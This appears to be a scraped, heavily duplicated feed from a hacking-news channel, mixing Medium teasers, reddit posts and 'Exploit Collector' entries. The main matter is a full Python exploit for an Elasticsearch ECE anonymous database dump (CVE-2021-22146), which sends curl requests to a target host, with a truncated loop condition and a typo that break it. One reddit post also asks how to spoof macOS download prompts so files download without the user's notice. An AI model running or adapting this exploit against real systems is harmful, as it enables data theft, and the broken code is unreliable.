Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Pegasus Spyware : Everything you need to know about it, Quickly!
https://cdn-images-1.medium.com/max/1007/1*t5Raj_g9yGX3YVJg_aRaUw.jpeg
Everyone these days is wondering What this term “Pegasus” is, From where did it come suddenly, How good/bad it is for a Common Man, So…
Continue reading on Medium »
Pegasus Spyware : Everything you need to know about it, Quickly!
https://cdn-images-1.medium.com/max/1007/1*t5Raj_g9yGX3YVJg_aRaUw.jpeg
Everyone these days is wondering What this term “Pegasus” is, From where did it come suddenly, How good/bad it is for a Common Man, So…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TOP 10 BEST BOOKS TO LEARN HACKING — Cyber Armour
https://cdn-images-1.medium.com/max/1920/0*4wFq28FykLgRFkBj.jpg
Best 10 Books To Learn Hacking
Continue reading on Medium »
TOP 10 BEST BOOKS TO LEARN HACKING — Cyber Armour
https://cdn-images-1.medium.com/max/1920/0*4wFq28FykLgRFkBj.jpg
Best 10 Books To Learn Hacking
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
La Cina nega l’hacking dei dati sul fiume Mekong e confuta il rapporto Reuters
https://cdn-images-1.medium.com/max/2600/0*2d_eEP1IeqEa7xk2
Il rapporto Reuters accusa la Cina dell’hacking di dati sul fiume Mekong dalla Cambogia: l’ambasciata cinese nega e accusa gli Stati Uniti.
Continue reading on Medium »
La Cina nega l’hacking dei dati sul fiume Mekong e confuta il rapporto Reuters
https://cdn-images-1.medium.com/max/2600/0*2d_eEP1IeqEa7xk2
Il rapporto Reuters accusa la Cina dell’hacking di dati sul fiume Mekong dalla Cambogia: l’ambasciata cinese nega e accusa gli Stati Uniti.
Continue reading on Medium »
Deep Web
why in the Deep web is full of bitcoin mining scam services?
But nowadays we know that they are all scams because those sites still exist XD
submitted by /u/31tnary
[link] [comments]
why in the Deep web is full of bitcoin mining scam services?
But nowadays we know that they are all scams because those sites still exist XD
submitted by /u/31tnary
[link] [comments]
reddit
why in the Deep web is full of bitcoin mining scam services?
But nowadays we know that they are all scams because those sites still exist XD
hacking: security in practice
Permissions and verification in mac downloads.
For any mac users here, how does Apple verify that you downloaded from a website before so it can freely download from it without asking for permission, for example, if you downloaded something from google drive for the first time, your mac will launch a pop up that tells you to either block the download or allow it, so how does your make verify that? and is there a way to spoof it to automatically download a file without the user's permission or notice? Thanks.
submitted by /u/Addey123
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Permissions and verification in mac downloads.
For any mac users here, how does Apple verify that you downloaded from a website before so it can freely download from it without asking for permission, for example, if you downloaded something from google drive for the first time, your mac will launch a pop up that tells you to either block the download or allow it, so how does your make verify that? and is there a way to spoof it to automatically download a file without the user's permission or notice? Thanks.
submitted by /u/Addey123
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Permissions and verification in mac downloads.
For any mac users here, how does Apple verify that you downloaded from a website before so it can freely download from it without asking for...
hacking: security in practice
Defcon 29 Badge Hacking Live
Would anyone who has a badge but is not going to defcon this year be interested in doing a live badge hacking on the Hakbreakz stream with me?
submitted by /u/Lamoneyman
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Defcon 29 Badge Hacking Live
Would anyone who has a badge but is not going to defcon this year be interested in doing a live badge hacking on the Hakbreakz stream with me?
submitted by /u/Lamoneyman
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Defcon 29 Badge Hacking Live
Would anyone who has a badge but is not going to defcon this year be interested in doing a live badge hacking on the Hakbreakz stream with me?
Cobalt Strike and Tradecraft
https://www.reddit.com/r/redteamsec/comments/os3oud/cobalt_strike_and_tradecraft/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/) [comments] (https://www.reddit.com/r/redteamsec/comments/os3oud/cobalt_strike_and_tradecraft/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/os3oud/cobalt_strike_and_tradecraft/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/) [comments] (https://www.reddit.com/r/redteamsec/comments/os3oud/cobalt_strike_and_tradecraft/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Cobalt Strike and Tradecraft
Posted in r/redteamsec by u/dmchell • 3 points and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Elasticsearch ECE 7.13.3 Database Disclosure
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
Elasticsearch ECE version 7.13.3 anonymous database dumping exploit.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Elasticsearch ECE 7.13.3 Database Disclosure
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
Elasticsearch ECE version 7.13.3 anonymous database dumping exploit.
MD5 |
4ac1b7bc67c52c5c05cd6ea91a56b7e3Download
# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <=
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180
import os
import argparse
import sys
######### Check Arguments
def checkArgs():
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
parser.add_argument('-s', "--host", action="store",
dest='host',
help="Host to attack.")
parser.add_argument('-p', "--port", action="store",
dest='port',
help="Elastic search port by default 9200 or 9201")
parser.add_argument('-i', "--index", action="store",
dest='index',
help="Index to dump (Example: 30)")
args = parser.parse_args()
if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) :
parser.print_help(sys.stderr)
sys.exit(1)
return args
def banner():
print(" _ _ _ _")
print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __")
print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")
print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")
print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")
print(" |_|")
def exploit(host,port,index):
if (index != 0):
final = int(index)
else:
final = 1000000000
cont = 0
while (cont <=
os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
cont = cont + 1
if __name__ == "__main__":
banner()
args = checkArgs()
if (args.index):
exploit(args.host,args.port,args.index)
else:
exploit(args.host,args.port,0)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Elasticsearch ECE 7.13.3 Database Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Zabbix 5.x SQL Injection / Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Zabbix 5.x SQL Injection / Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Zabbix 5.x SQL Injection / Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
XOS Shop 1.0.9 Arbitrary File Deletion
___________________________
@hacking_Attack
@Hacking_Video
XOS Shop 1.0.9 Arbitrary File Deletion
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
XOS Shop 1.0.9 Arbitrary File Deletion
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.